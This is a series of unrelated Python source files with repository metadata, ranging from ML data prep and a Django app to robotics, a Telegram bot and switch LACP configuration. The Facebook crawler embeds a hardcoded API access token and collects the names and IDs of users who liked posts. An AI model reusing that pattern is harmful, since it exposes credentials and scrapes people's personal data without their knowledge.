fdf[not_ionic]\n\n#completing null or non-finite cells\nfdf = fdf.fillna(0)\nfdf = fdf.replace([np.inf, -np.inf], 0)\n\n#possible properties to be predicted\ntargetsList = ['K_VRH','G_VRH','elastic_anisotropy','poisson_ratio']\ny = fdf[targetsList]\n\n#excluded = non-numerical descriptors\nexcluded = ['material_id', 'structure', 'elastic_anisotropy',\n\t\t\t'K_VRH', 'G_VRH', 'poisson_ratio', 'elasticity',\n 'formula', 'composition', 'composition_oxid',\n 'HOMO_character', 'HOMO_element',\n 'LUMO_character', 'LUMO_element']\n\nX = fdf.drop((targetsList+excluded), axis=1)\n\n#normalizing values\nscaler = MinMaxScaler(feature_range=(0, 1))\nX = pd.DataFrame(scaler.fit_transform(X), columns=X.columns, index=X.index)\n\n#correcting indexes\nX, y = X.sort_index(), y.sort_index()\n\n#exporting\nprint(\"The descriptor dataset has {} entries\".format(fdf.shape))\nprint (X.head())\n\nstore_dataframe_as_json(X, 'data/descriptors.json', compression=None, orient='split')\nstore_dataframe_as_json(y, 'data/targets.json', compression=None, orient='split')","repo_name":"deividaphen/sinope","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14331834268","text":"from rest_framework import serializers\n\nfrom graph import graphs\nfrom graph.models import Graph\nfrom machine.models import Machine\n\nclass GraphSerializer(serializers.ModelSerializer):\n class Meta:\n model = Graph\n fields = (\"Machine\", \"GraphType\", \"X\", \"Y\", \"Z\", \"Color\", \"ColorScales\", \"div\")\n depth = 1\n\n div = serializers.SerializerMethodField()\n\n\n def validate_Machine(self, value):\n Machine_ID = int( value )\n machine = Machine.objects.get( pk=Machine_ID )\n value = machine\n return value\n\n def get_div( self, graph ):\n machine = graph.Machine\n GraphType = graph.GraphType\n x = graph.X\n y = graph.Y\n z = graph.Z\n color = None\n colorset = graph.ColorScales\n\n try:\n if GraphType == \"1\":\n graph_div = graphs.g1(machine, x, y, color, colorset)\n elif GraphType == \"2\":\n graph_div = graphs.g2(machine, x, y, color, colorset)\n elif GraphType == \"3\":\n graph_div = graphs.g3(machine, x, y, color, colorset)\n elif GraphType == \"4\":\n graph_div = graphs.g4(machine, x, y, z, color, colorset)\n elif GraphType == \"5\":\n graph_div = graphs.g5(machine, color, colorset)\n elif GraphType == \"6\":\n graph_div = graphs.g6(machine, x, y, color, z, colorset)\n elif GraphType == \"7\":\n graph_div = graphs.g7(machine, x, y, colorset)\n elif GraphType == \"8\":\n graph_div = graphs.g8(machine, x, y, colorset)\n elif GraphType == \"9\":\n graph_div = graphs.g9(machine, x, y, color, colorset)\n elif GraphType == \"10\":\n graph_div = graphs.g10(machine, x, y, z, color, colorset)\n else:\n graph_div = ''\n\n except Exception as e:\n graph_div = \"\"\"
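# ---- Editor's aside (hedged worked example; not part of the surrounding record) ----
# Wrapping fit_transform in pd.DataFrame(..., columns=X.columns, index=X.index)
# as done above is what preserves the labels, since sklearn returns a bare ndarray:
import pandas as pd
from sklearn.preprocessing import MinMaxScaler

X = pd.DataFrame({'f': [2.0, 4.0, 6.0]}, index=[10, 11, 12])
scaler = MinMaxScaler(feature_range=(0, 1))
Xs = pd.DataFrame(scaler.fit_transform(X), columns=X.columns, index=X.index)
assert Xs['f'].tolist() == [0.0, 0.5, 1.0]
assert Xs.index.tolist() == [10, 11, 12]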
\n {}\n
\n                    \"\"\".format(repr(e))\n\n        return graph_div\n","repo_name":"vitalfadeev/AI","sub_path":"graph/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"32928455324","text":"import requests\nimport pandas as pd \nfrom dateutil.parser import parse\n\n\n# Obtain the access token and the fan page ID from the Facebook Graph API Explorer\n\n\ntoken = 'EAACEdEose0cBABLDyzmSZBstZCNoocfYFkVbcLOC3NPwTJVorioUeG2sZCCNVHl10ZACAKvXDwPo1yaKm70ImHErNz4Rno6RqQi8UWflsUrDKhzhuLZCR7TFhCTJVmVylZAHc3v6YX3ZCYVWevMKnj2jCbVGyMrlZABl70rB1gxZBYvlOlaQkhbl7ZBBoNSafMUr4ZD' \nfanpage_id = '342571109112167'\n\n# Create an empty list\n\n\ninformation_list = []\n\n\n# Target page\n\n\nres = requests.get('https://graph.facebook.com/v2.10/{}/posts?limit=100&access_token={}'.format(fanpage_id, token))\npage = 1 \n\n\n# The API returns at most 100 records per call, so use a while loop to page through all of the posts\n\n\nwhile 'paging' in res.json(): \n    for index, information in enumerate(res.json()['data']):\n        print('Crawling page {}, post {}'.format(page, index + 1))\n        \n        \n        # Check whether this entry is a post; if so, start collecting the IDs of users who liked it\n\n\n        if 'message' in information:\n            res_post = requests.get('https://graph.facebook.com/v2.10/{}/likes?limit=1000&access_token={}'.format(information['id'], token))\n            \n            \n            # Check whether more than 1000 people liked the post; if so, the likes must be fetched page by page. When nobody liked the post, the liker name and ID are both recorded as NO\n\n            try:\n                if 'next' not in res_post.json()['paging']:\n                    for likes in res_post.json()['data']:\n                        information_list.append([information['id'], information['message'], parse(information['created_time']).date(), likes['id'], likes['name']]) \n                elif 'next' in res_post.json()['paging']:\n                    while 'paging' in res_post.json():\n                        for likes in res_post.json()['data']:\n                            information_list.append([information['id'], information['message'], parse(information['created_time']).date(), likes['id'], likes['name']])\n                        if 'next' in res_post.json()['paging']:\n                            res_post = requests.get(res_post.json()['paging']['next'])\n                        else:\n                            break\n                    for i in information_list:\n                        print(i[1])\n            except:\n                information_list.append([information['id'], information['message'], parse(information['created_time']).date(), \"NO\", \"NO\"])\n\n    if 'next' in res.json()['paging']: \n        res = requests.get(res.json()['paging']['next'])\n        page += 1\n    else:\n        break\n    \nprint('Crawling finished!')\n","repo_name":"powersyncmis/python","sub_path":"facebook/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
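# ---- Editor's aside (hedged sketch; not part of the surrounding records) ----
# The crawler above follows Graph-API style cursors by re-requesting
# res.json()['paging']['next'] until it disappears. The loop's generic shape:
import requests

def iter_pages(url, params=None):
    # yield each 'data' batch of a cursor-paginated JSON API
    resp = requests.get(url, params=params)
    while True:
        payload = resp.json()
        yield payload.get('data', [])
        nxt = payload.get('paging', {}).get('next')
        if not nxt:
            break
        resp = requests.get(nxt)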
request.user.department == \"technician\":\n if request.method == \"GET\":\n return True\n else:\n return False\n","repo_name":"seah78/P12","sub_path":"account/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1786516233","text":"from xarm.wrapper import XArmAPI\r\nimport math\r\nimport time\r\nimport requests\r\nimport struct\r\nimport numpy as np\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits import mplot3d\r\nimport matplotlib.colors as mcolors\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport matplotlib.lines as mlines\r\nimport pandas as pd\r\n\r\n'''\r\nInitializing the robot arm\r\n'''\r\nrequests.get('http://192.168.1.158:18333/')\r\n\r\narm = XArmAPI(\"192.168.1.158\")\r\narm.motion_enable(enable = True)\r\narm.set_mode(0)\r\narm.set_state(state = 0)\r\n\r\nspeed = 40\r\n\r\ndef calibrate(self):\r\n q = 0\r\n while True:\r\n #rpos is the position that the robot thinks it is (robot position)\r\n #epos is the position that the robot actually is (encoder position) -takes in x,y,z from the encoders\r\n rpos = self.get_position()[1][0:3]\r\n epos = [x, y, z]\r\n \r\n diff = [epos[0] - rpos[0], epos[1] - rpos[1], epos[2] - rpos[2]]\r\n if q == 0:\r\n with open('Robot_Calibration_Datapoints.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n## writer.writerow(['Measured_X','Measured_Y','Measured_Z', 'Actual_X', 'Actual_Y', 'Actual_Z']) #this line is only run the first time you go through the code so that you have headers in the file\r\n datapoints = rpos + epos\r\n writer.writerow(datapoints)\r\n \r\n \r\n abs_diff = [abs(diff[0]), abs(diff[1]), abs(diff[2])]\r\n \r\n if abs_diff <= [0.5, 0.5, 0.5]:\r\n break\r\n \r\n shift = diff + [0, 0, 0] \r\n self.set_position_aa(shift, speed=speed, relative = True, wait = True)\r\n q += 1\r\n print(f'The system is within 0.5 mm of the actual location, which took ' + q + ' shifts')\r\n\r\ndef plot_calibration():\r\n #Extract the data from the csv file\r\n datapoints = pd.read_csv('Robot_Calibration_Datapoints.csv')\r\n system_measured_points = np.transpose(np.array([datapoints.Measured_X, datapoints.Measured_Y, datapoints.Measured_Z]))\r\n actual_points = np.transpose(np.array([datapoints.Actual_X, datapoints.Actual_Y, datapoints.Actual_Z]))\r\n print(system_measured_points)\r\n print(actual_points)\r\n \r\n # Calculate the difference between system-measured points and actual points\r\n difference = system_measured_points - actual_points\r\n print(difference)\r\n normalized_difference = difference / np.linalg.norm(difference, axis=1, keepdims=True) # Normalize differences\r\n\r\n # Create a 3D plot\r\n fig1 = plt.figure(1)\r\n ax = fig1.add_subplot(111, projection='3d')\r\n\r\n # Set the line colors based on the difference in coordinates\r\n for i in range(len(difference)):\r\n if np.all(difference[i] < 0):\r\n line_color = 'blue' # All negative differences\r\n elif np.all(difference[i] > 0):\r\n line_color = 'red' # All positive differences\r\n elif (difference[i, 0] < 0 and difference[i, 1] < 0) or (difference[i, 1] < 0 and difference[i, 2] < 0) or (difference[i, 0] < 0 and difference[i, 2] < 0):\r\n line_color = 'rebeccapurple'\r\n else:\r\n line_color = 'mediumvioletred' # Mixed differences\r\n ax.plot([actual_points[i, 0], system_measured_points[i, 0]],\r\n [actual_points[i, 1], system_measured_points[i, 1]],\r\n [actual_points[i, 2], system_measured_points[i, 
\r\ndef plot_calibration():\r\n    #Extract the data from the csv file\r\n    datapoints = pd.read_csv('Robot_Calibration_Datapoints.csv')\r\n    system_measured_points = np.transpose(np.array([datapoints.Measured_X, datapoints.Measured_Y, datapoints.Measured_Z]))\r\n    actual_points = np.transpose(np.array([datapoints.Actual_X, datapoints.Actual_Y, datapoints.Actual_Z]))\r\n    print(system_measured_points)\r\n    print(actual_points)\r\n    \r\n    # Calculate the difference between system-measured points and actual points\r\n    difference = system_measured_points - actual_points\r\n    print(difference)\r\n    normalized_difference = difference / np.linalg.norm(difference, axis=1, keepdims=True)  # Normalize differences\r\n\r\n    # Create a 3D plot\r\n    fig1 = plt.figure(1)\r\n    ax = fig1.add_subplot(111, projection='3d')\r\n\r\n    # Set the line colors based on the difference in coordinates\r\n    for i in range(len(difference)):\r\n        if np.all(difference[i] < 0):\r\n            line_color = 'blue'  # All negative differences\r\n        elif np.all(difference[i] > 0):\r\n            line_color = 'red'  # All positive differences\r\n        elif (difference[i, 0] < 0 and difference[i, 1] < 0) or (difference[i, 1] < 0 and difference[i, 2] < 0) or (difference[i, 0] < 0 and difference[i, 2] < 0):\r\n            line_color = 'rebeccapurple'\r\n        else:\r\n            line_color = 'mediumvioletred'  # Mixed differences\r\n        ax.plot([actual_points[i, 0], system_measured_points[i, 0]],\r\n                [actual_points[i, 1], system_measured_points[i, 1]],\r\n                [actual_points[i, 2], system_measured_points[i, 2]], c=line_color)\r\n\r\n    # Add labels and legend\r\n    ax.set_xlabel('X')\r\n    ax.set_ylabel('Y')\r\n    ax.set_zlabel('Z')\r\n\r\n    # Set up a legend for the line colors\r\n    legend_lines = [mlines.Line2D([], [], color = 'blue', label = 'Negative Difference', linewidth = 2),\r\n                    mlines.Line2D([], [], color = 'red', label = 'Positive Difference', linewidth = 2),\r\n                    mlines.Line2D([], [], color = 'rebeccapurple', label = 'Seminegative Difference', linewidth = 2),\r\n                    mlines.Line2D([], [], color = 'mediumvioletred', label = 'Semipositive Difference', linewidth = 2)]\r\n    # Add the custom lines to the legend\r\n    ax.legend(handles = legend_lines, loc = 'upper center', bbox_to_anchor = (0.9, 1.15))\r\n\r\n    line = [None, None, None]\r\n    for i in range(3):\r\n        if max(actual_points[:,i]) > max(system_measured_points[:,i]):\r\n            line[i] = np.linspace(0, max(actual_points[:,i]))\r\n        else:\r\n            line[i] = np.linspace(0, max(system_measured_points[:,i]))\r\n    \r\n    # Create a figure and three subplots\r\n    fig2, (ax1, ax2, ax3) = plt.subplots(3, 1, figsize = (7, 7))\r\n\r\n    # Plot data on each subplot\r\n    ax1.scatter(actual_points[:, 0], system_measured_points[:, 0], label = 'X Differences', color = 'blue')\r\n    ax1.plot(line[0], line[0], color = 'blue', linewidth = 0.5)\r\n    ax2.scatter(actual_points[:, 1], system_measured_points[:, 1], label = 'Y Differences', color = 'green')\r\n    ax2.plot(line[1], line[1], color = 'green', linewidth = 0.5)\r\n    ax3.scatter(actual_points[:, 2], system_measured_points[:, 2], label = 'Z Differences', color = 'red')\r\n    ax3.plot(line[2], line[2], color = 'red', linewidth = 0.5)\r\n\r\n    # Set titles and labels for each subplot\r\n    ax1.set_xlabel('Actual X')\r\n    ax1.set_ylabel('Measured X')\r\n    ax1.legend()\r\n\r\n    ax2.set_xlabel('Actual Y')\r\n    ax2.set_ylabel('Measured Y')\r\n    ax2.legend()\r\n\r\n    ax3.set_xlabel('Actual Z')\r\n    ax3.set_ylabel('Measured Z')\r\n    ax3.legend()\r\n\r\n    # Adjust spacing between subplots\r\n    plt.tight_layout()\r\n\r\n    # Show the plot\r\n    plt.show()\r\n    \r\ncalibrate(arm)\r\nplot_calibration()\r\n\r\n\r\n\r\n    \r\n","repo_name":"williamsikkema/Vitacore","sub_path":"Rebecca/Calibration.py","file_name":"Calibration.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"10606560801","text":"from setuptools import setup\n\nwith open(\"README.md\") as file:\n    read_me = file.read()\n\nwith open(\"requirements.txt\") as file:\n    requires = file.read().split('\\n')\n\nsetup(\n    name=\"kerio\",\n    version=\"0.1\",\n    author=\"birdiecode\",\n    author_email=\"birdiecode@protonmail.com\",\n    license='GPLv3',\n    description=\"API for interacting with Kerio Technologies products.\",\n    long_description=read_me,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/birdiecode/kerio-python-api\",\n    packages=['kerio'],\n    python_requires='>=3.5',\n    install_requires=requires\n)\n","repo_name":"birdiecode/kerio-python-api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"30377200148","text":"from typing import List\n\n\ndef solution(nums: List[list]) -> List[List[int]]:\n    results = []\n    prev_elements = []\n\n    def dfs(elements):\n        # If this is a leaf node, record the result.\n        if len(elements) == 0:\n            # Append a copy of the path so far to results,\n            # which is what makes every completed permutation count.\n            results.append(prev_elements[:])\n\n        # Recurse to generate the remaining permutations\n        for e in elements:\n            
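# ---- Editor's aside (hedged equivalence; the dfs() body continues right below) ----
# For distinct inputs, the remove-one-element DFS built here produces the same
# orderings as itertools.permutations, n! of them:
from itertools import permutations
from math import factorial

assert [list(p) for p in permutations([1, 2])] == [[1, 2], [2, 1]]
assert len(list(permutations(range(4)))) == factorial(4)   # 24 orderings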
next_elements = elements[:]\n next_elements.remove(e)\n\n prev_elements.append(e)\n dfs(next_elements)\n prev_elements.pop()\n\n dfs(nums)\n return results\n\n\ntest1 = [1, 2, 3]\n\nsolution(test1)\n","repo_name":"s3ich4n/coding_interview_self_taught","sub_path":"codes/pt4/12_graph/q34/01_premutations.py","file_name":"01_premutations.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5807388439","text":"import sys\nfrom PyQt5.QtWidgets import QApplication\nfrom View.MainWindowEPS import MainWindowEPS\n\n\n\nclass App:\n\n def main(self):\n app = QApplication(sys.argv) # iniciar sistema gráfico\n window_client = MainWindowEPS() # crear objeto de la ventana\n window_client.open_file()\n # window_client.init_window()\n window_client.show() # mostrar ventana\n\n # window_eps = MainWindowEPS()\n # window_eps.open_file()\n # window_eps.init_window()\n # window_eps.show() # mostrar ventana\n\n app.exec_() # saliendo del sistema\n\n\napp = App()\napp.main()\n","repo_name":"sarmero/my-project-phyton","sub_path":"ProgramClainsSuggetions/ProjectClainsSuggetionsEPS/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18234911285","text":"import cv2\nimport numpy as np\nfrom siamfc import TrackerSiamFC\n\ndef rectangleImg(img,startPt,stopPt,color=(0,0,255),thickness=2):\n return cv2.rectangle(img, startPt, stopPt, color=color, thickness=thickness) \n\ndef cameraTracking():\n net_path = 'siamfc_alexnet_e554.pth'\n tracker = TrackerSiamFC(net_path=net_path)\n\n cap = cv2.VideoCapture(0) #set tracking target boundingbox, press enter\n ret, first_frame = cap.read()\n cv2.imshow('first_frame',first_frame)\n bbi = cv2.selectROI('first_frame',first_frame)\n cv2.destroyAllWindows() \n print('The object you select:', bbi)\n \n tracker.init(first_frame, bbi)\n \n while(True):\n ret, frame = cap.read()\n \n box = tracker.update(frame)\n #print('box=',box)\n \n pt1 = (int(box[0]), int(box[1]))\n pt2 = (int(box[0] + box[2]), int(box[1]+box[3]))\n show = rectangleImg(frame, pt1, pt2)\n\n # Display the resulting frame\n cv2.imshow('frame',show)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n cameraTracking()\n","repo_name":"StevenHuang2020/SiameseFc_PyTorch","sub_path":"src/videoCapTracking.py","file_name":"videoCapTracking.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20924082848","text":"import re\r\nimport logging\r\nfrom loader import dp, db\r\nfrom aiogram import types\r\nfrom datetime import datetime\r\n\r\nfrom aiogram.dispatcher import FSMContext\r\n\r\nfrom states.edit_weather_time import StateWeatherTime\r\nfrom keyboards.inline.yes_no import yes_no\r\n\r\n\r\n@dp.message_handler(commands=['setting_weather_time'])\r\nasync def edit_weather_time(message: types.Message):\r\n # User chat id\r\n user_id = message.chat.id\r\n # Taking the weather time value from database\r\n current_weather_time = await db.select_weather_time(chat_id=user_id)\r\n # Parsing time format time(00:00:00) to str(00:00)\r\n just_time = str(current_weather_time['weather_time'])[:5]\r\n # Text\r\n text = (f\"👋 Today is {datetime.now().strftime('%A')}\\n\",\r\n \"🌦 What time of day do you need weather information? 
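# ---- Editor's aside (hedged sketch; not part of the surrounding records) ----
# cameraTracking() in the SiamFC record above follows the standard OpenCV
# select-ROI-once / update-per-frame loop. The same shape with a stock OpenCV
# tracker (TrackerKCF_create is assumed from opencv-contrib; where the factory
# lives varies by OpenCV version):
import cv2

def track_camera(source=0):
    cap = cv2.VideoCapture(source)
    ok, first = cap.read()
    box = cv2.selectROI('first_frame', first)
    cv2.destroyAllWindows()
    tracker = cv2.TrackerKCF_create()
    tracker.init(first, box)
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        ok, box = tracker.update(frame)
        # draw the box / break on a keypress, as in the record above
    cap.release()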
\",\r\n \"if you want to receive news, follow \",\r\n \"write it down in the form and do it every day \",\r\n \"we will send you an update in time.\\n\",\r\n \"🕔 Time Format:\",\r\n \"09:00 - nine in the morning\",\r\n \"12:00 - Lunch Time\",\r\n \"21:00 - Nine in the evening\",\r\n \"00:00 - Midnight\\n\",\r\n f\"🕔 Weather updates come daily at {just_time}\",)\r\n text = '\\n'.join(text)\r\n # Send Message\r\n await message.reply(text=text)\r\n\r\n # Statement\r\n await StateWeatherTime.weather_time.set()\r\n\r\n\r\nasync def check_time(message, state):\r\n # Regex Pattern\r\n pattern = r'^(?:[01]\\d|2[0-3]):[0-5]\\d$'\r\n # User chat id\r\n user_id = message.chat.id\r\n # Taking the weather time value from database\r\n current_weather_time = await db.select_weather_time(chat_id=user_id)\r\n # Parsing time format time(00:00:00) to str(00:00)\r\n just_time = str(current_weather_time['weather_time'])[:5]\r\n # Checking time by the regular Expression (Regex)\r\n if re.match(pattern, message.text):\r\n # Saving time value to FSMContext\r\n async with state.proxy() as data:\r\n data['time'] = message.text\r\n # Text\r\n text = (f'👋 Today is {datetime.now().strftime(\"%A\")}',\r\n f'🕔 Weather updates come daily at {just_time}. But\\n',\r\n f'🌦 Would you like to receive daily weather updates at {message.text} ?',)\r\n text = '\\n'.join(text)\r\n # This is inline button `yes` and `no` for confirm time\r\n inline_keyboard = yes_no()\r\n # Send Message\r\n await message.reply(text=text, reply_markup=inline_keyboard)\r\n # Statement\r\n await StateWeatherTime.confirm.set()\r\n else:\r\n # Text\r\n text = (f\"❌ I didn`t get it: \\n\",\r\n f\"🤖 Commands:\",\r\n f\"/start - Start the bot\",\r\n f\"/help - Help\",\r\n f\"/setting_weather_time - Setting the weather time\",\r\n f\"/current_weather - Current weather data\",\r\n f\"🤔 If you want to change the WEATHER time, resend the correct time.\\n\",\r\n f\"🕔 Weather updates come daily at {just_time}\")\r\n text = '\\n'.join(text)\r\n # Send Message\r\n await message.reply(text=text)\r\n # Statement finish\r\n await state.finish()\r\n\r\n\r\n@dp.message_handler(state=StateWeatherTime.weather_time)\r\nasync def regex_time(message: types.Message, state: FSMContext):\r\n # Statement\r\n # checking the time format from (00:00) to (23:59)\r\n await check_time(message, state)\r\n\r\n\r\n@dp.message_handler(state=None)\r\nasync def bot_echo(message: types.Message, state: FSMContext):\r\n # No Statement\r\n # Checking the time format from (00:00) to (23:59)\r\n await check_time(message, state)\r\n\r\n\r\n@dp.callback_query_handler(text=['yes', 'no'], state=StateWeatherTime.confirm)\r\nasync def confirm_time(call: types.CallbackQuery, state: FSMContext):\r\n # Callback_data\r\n conf_data = call.data\r\n # User chat id\r\n user_id = call.message.chat.id\r\n # take time from database by user_id field\r\n current_weather_time = await db.select_weather_time(chat_id=user_id)\r\n # time format from (00:00:00) to (00:00)\r\n just_time = str(current_weather_time['weather_time'])[:5]\r\n # saving time value in FSMContext\r\n async with state.proxy() as data:\r\n text_time = data['time']\r\n\r\n if conf_data == 'yes':\r\n # Parsing from str(time) to datetime(time) and saving to database\r\n await db.update_weather_time(time=datetime.strptime(text_time, '%H:%M').time(), user_id=user_id)\r\n # Text\r\n alert_text = f\"🕔 {text_time} saved!\"\r\n # Send Alert Message\r\n await call.answer(text=alert_text, cache_time=60000)\r\n # Text\r\n message_text = f'🕔 {text_time} 
saved!'\r\n # Send Message\r\n await call.message.answer(text=message_text)\r\n\r\n elif conf_data == 'no':\r\n # Text\r\n alert_text = f\"⚠️ {text_time} not save\"\r\n # Send Alert Message\r\n await call.answer(text=alert_text, cache_time=60000)\r\n # Text\r\n message_text = f'⚠️ {text_time} didn`t save!'\r\n # Send Message\r\n await call.message.answer(text=message_text)\r\n # Text\r\n answer_text = (f\"👋 Today is {datetime.now().strftime('%A')}\",\r\n f\"🕔 Weather updates come daily at {just_time}\")\r\n answer_text = '\\n'.join(answer_text)\r\n # Send Message\r\n await call.message.answer(text=answer_text)\r\n # Statement finish\r\n await state.finish()\r\n","repo_name":"AsadbekSolijonov/DemoNews","sub_path":"handlers/users/edit_weather_time.py","file_name":"edit_weather_time.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"8396085644","text":"from script import *\nimport unittest\nfrom io import StringIO\nimport sys\n\ntest_block1 = Block(0, 36, 286, 67, -27, 20.83, 0, 0)\ntest_block2 = Block(1, 37, 286, 67, -117, 83.33, 0, 0)\njson_test = {\n\t\t\t\t\t\"_id\": 0,\n\t\t\t\t\t \"x\": 36, \"y\": 286,\n\t\t\t\t\t \"z\": 67, \"block_value\": -27, \n\t\t\t\t\t \"ton\": 20.83, \"destination\": 0, \n\t\t\t\t\t \"au\": 0\n\t\t\t\t} \n\n\nclass TestBlocks(unittest.TestCase):\n\n def test_to_json(self):\n self.assertEqual(test_block1.to_json(),json_test )\n\n def test_save_in_database(self):\n test_block1.save_in_database()\n block = blocks.find_one({\"_id\":test_block1._id})\n self.assertTrue(block)\n\n def test_print_block(self):\n output = StringIO() \n sys.stdout = output \n test_block1.print_block() \n sys.stdout = sys.__stdout__ \n self.assertEqual(output.getvalue(), \"{'_id': 0, 'x': 36, 'y': 286, 'z': 67, 'block_value': -27, 'ton': 20.83, 'destination': 0, 'au': 0}\\n\" )\n\n \n\nif __name__ == \"__main__\":\n unittest.main()\n ","repo_name":"TGRaydas/SoftwareDesign_Project_1","sub_path":"test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13531411399","text":"# funBaConf.py\n\n# $language = \"python\"\n# $interface = \"1.0\"\n\nfrom logging import root\nimport sys\nimport time\nimport os\nimport basic.basicConf as bc\nimport mef.mefConf as mc\nimport lag.lagVef as lav\n\n\ndef disSubTitle(child,Title):\n child.send_command(Title )\n\n\ndef staticLag(child,lagin):\n config_set = [\n f'interface {lagin[0]}', \n 'channel-group 1 mode on working',\n f'interface {lagin[1]}',\n 'channel-group 1 mode on protection'\n ]\n child.send_config_set(config_set)\n\ndef activeLacp(child,lagin):\n config_set = [\n f'interface {lagin[0]}', \n 'channel-group 1 mode active',\n 'lacp timeout short',\n f'interface {lagin[1]}',\n 'channel-group 1 mode active',\n 'lacp timeout short'\n ]\n child.send_config_set(config_set)\n\ndef passiveLacp(child,lagin):\n config_set = [\n f'interface {lagin[0]}', \n 'channel-group 1 mode passive',\n 'lacp timeout short',\n f'interface {lagin[1]}',\n 'channel-group 1 mode passive',\n 'lacp timeout short'\n ]\n child.send_config_set(config_set)\n\ndef changeMaxMember(child,maxmember):\n child.send_config_set(f'port-channel 1 max-member {maxmember}')\n\ndef delNniInt(child):\n config_set = ['ethernet nni nni1', 'no map interface']\n child.send_config_set(config_set) \n\ndef addNniInt(child):\n config_set = ['ethernet nni nni1', 
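# ---- Editor's aside (hedged worked example; not part of the surrounding records) ----
# The weather handler above validates input with r'^(?:[01]\d|2[0-3]):[0-5]\d$'.
# What that pattern does and does not accept:
import re

HHMM = re.compile(r'^(?:[01]\d|2[0-3]):[0-5]\d$')
assert HHMM.match('09:00') and HHMM.match('23:59') and HHMM.match('00:00')
assert not HHMM.match('24:00')   # hours stop at 23
assert not HHMM.match('9:00')    # two digits are required
assert not HHMM.match('12:60')   # minutes stop at 59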
'map interface po1']\n child.send_config_set(config_set) \n\ndef delPortCh(child,lagin): \n config_set = [f'interface range {lagin[0]}-{lagin[1]}', 'no channel-group']\n child.send_config_set(config_set)\n\ndef deflacpTime(child,lagin): \n config_set = [f'interface range {lagin[0]}-{lagin[1]}', 'lacp timeout long']\n child.send_config_set(config_set)\n\ndef noshutLagInt(child,lagin): \n config_set = [f'interface range {lagin[0]}-{lagin[1]}', 'no shutdown']\n # config_set = ['interface po1', 'no shutdown']\n child.send_config_set(config_set)\n\ndef shutLagInt(child,lagin): \n config_set = [f'interface range {lagin[0]}-{lagin[1]}', 'shutdown']\n # config_set = ['interface po1', 'shutdown']\n child.send_config_set(config_set)\n\n###################################################################################\n\n### Static Link Aggregation ###\t \ndef confLag(host,lagin):\n with bc.connect(host) as child:\n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n staticLag(child,lagin)\n time.sleep(1)\n addNniInt(child)\n time.sleep(1)\n noshutLagInt(child,lagin)\n time.sleep(1)\n\n### Static Link Aggregation ###\t \ndef confLacp(host,lagin):\n with bc.connect(host) as child:\n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n activeLacp(child,lagin)\n time.sleep(1)\n addNniInt(child)\n time.sleep(1)\n noshutLagInt(child,lagin)\n time.sleep(5)\n\n### Pure Static Link Aggregation ###\t \ndef removeLag(host,lagin):\n with bc.connect(host) as child:\n shutLagInt(child,lagin)\n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n delPortCh(child,lagin)\n time.sleep(1) \n\n\n### Pure Static Link Aggregation ###\t \ndef removeLacp(host,lagin):\n with bc.connect(host) as child:\n svc = 1\n uni = 1\n shutLagInt(child,lagin)\n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n deflacpTime(child,lagin)\n time.sleep(1)\n delPortCh(child,lagin)\n time.sleep(1) \n mc.dltServi(host,svc,uni)\n time.sleep(1)\n\n### Redundant Static Link Aggregation ###\t \n\ndef confStaticLag(host,lagin):\n result = []\n confLag(host,lagin)\n print('#' * 3 + ' check static channel-group ' + '#' * 3)\n result.append(lav.checkPortChannel(host,'static',lagin))\n time.sleep(1)\n print('#' * 3 + ' check BCM Port state ' + '#' * 3)\n result.append(lav.checkBcmPort(host,'hotstandby'))\n print(result)\n return result.count('Ok')\n\ndef confBasicLacp(host,lagin): \n with bc.connect(host) as child: \n result = []\n confLacp(host,lagin)\n time.sleep(10)\n print('#' * 3 + ' check lacp active Mode ' + '#' * 3)\n result.append(lav.checkPortChannel(host,'lacp',lagin))\n result.append(lav.checkLacpInternal(host,'active')) \n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n passiveLacp(child,lagin)\n time.sleep(1) \n addNniInt(child)\n time.sleep(5)\n print('#' * 3 + ' check lacp passive Mode ' + '#' * 3) \n result.append(lav.checkPortChannel(host,'lacp',lagin))\n result.append(lav.checkLacpInternal(host,'passive'))\n time.sleep(1)\n changeMaxMember(child,1)\n time.sleep(5)\n print('#' * 3 + ' check lacp MaxMember 1 ' + '#' * 3) \n 